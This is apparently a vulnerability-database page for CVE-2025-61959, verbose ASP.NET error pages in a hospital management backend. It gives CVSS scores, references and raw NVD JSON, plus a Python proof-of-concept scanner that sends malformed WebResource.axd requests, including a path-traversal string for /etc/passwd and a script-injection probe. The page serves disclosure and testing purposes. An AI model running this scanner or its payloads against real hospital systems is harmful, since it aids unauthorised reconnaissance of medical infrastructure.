CVE-2025-61959

Description

Prior to September 19, 2025, the Hospital Manager Backend Services returned verbose ASP.NET error pages for invalid WebResource.axd requests, disclosing framework and ASP.NET version information, stack traces, internal paths, and the insecure configuration 'customErrors mode="Off"', which could have facilitated reconnaissance by unauthenticated attackers.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vertikalsystems:hospital_manager_backend_services:*:*:*:*:*:*:*:* - VULNERABLE

Hospital Manager Backend Services < 2025-09-19修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-61959 PoC - Hospital Manager Information Disclosure
# Target: Hospital Manager Backend Services
# Vulnerability: Verbose ASP.NET error pages leak sensitive information

def exploit_cve_2025_61959(target_url):
    """
    Exploit for CVE-2025-61959
    Sends malformed WebResource.axd requests to trigger detailed error pages
    """
    
    # List of malicious WebResource.axd requests
    payloads = [
        "/WebResource.axd?d=invalid_id",
        "/WebResource.axd?d=<script>alert(1)</script>",
        "/WebResource.axd?d=../../../etc/passwd",
        "/WebResource.axd?t=invalid_type",
        "/WebResource.axd",
        "/WebResource.axd?d=test&t=1234567890"
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-61959 - Hospital Manager Information Disclosure\n")
    
    for payload in payloads:
        try:
            url = target_url.rstrip('/') + payload
            print(f"[+] Sending request: {payload}")
            
            response = requests.get(url, timeout=10, verify=False)
            
            # Check for information disclosure indicators
            indicators = [
                "ASP.NET",
                "Stack Trace",
                "System.Web",
                "customErrors",
                "mode=\"Off\"",
                "at ",
                ".cs:line",
                "Server Error",
                "Configuration Error"
            ]
            
            response_text = response.text
            found_indicators = []
            
            for indicator in indicators:
                if indicator in response_text:
                    found_indicators.append(indicator)
            
            if found_indicators:
                print(f"    [!] VULNERABLE! Found indicators: {', '.join(found_indicators)}")
                print(f"    [i] Status code: {response.status_code}")
                print(f"    [i] Response length: {len(response_text)} bytes\n")
                return True
            else:
                print(f"    [-] No information disclosure detected\n")
                
        except requests.exceptions.RequestException as e:
            print(f"    [!] Error: {e}\n")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2025_61959(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61959
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61959
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61959/
[4] VulDB https://vuldb.com/cve/CVE-2025-61959
[5] https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-301-01
[6] https://www.vertikalsystems.com/en/products/pm/contact.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61959", "sourceIdentifier": "[email protected]", "published": "2025-10-29T22:15:40.733", "lastModified": "2025-11-06T19:20:34.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Prior to September 19, 2025, the Hospital Manager Backend Services returned verbose ASP.NET error pages for invalid WebResource.axd requests, disclosing framework and ASP.NET version information, stack traces, internal paths, and the insecure configuration 'customErrors mode=\"Off\"', which could have facilitated reconnaissance by unauthenticated attackers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vertikalsystems:hospital_manager_backend_services:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-19", "matchCriteriaId": "F9A856B2-70B6-4025-B853-B04C9080D91D"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-301-01", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory", "US Government Resource"]}, {"url": "https://www.vertikalsystems.com/en/products/pm/contact.php", "source": "[email protected]", "tags": ["Product"]}]}}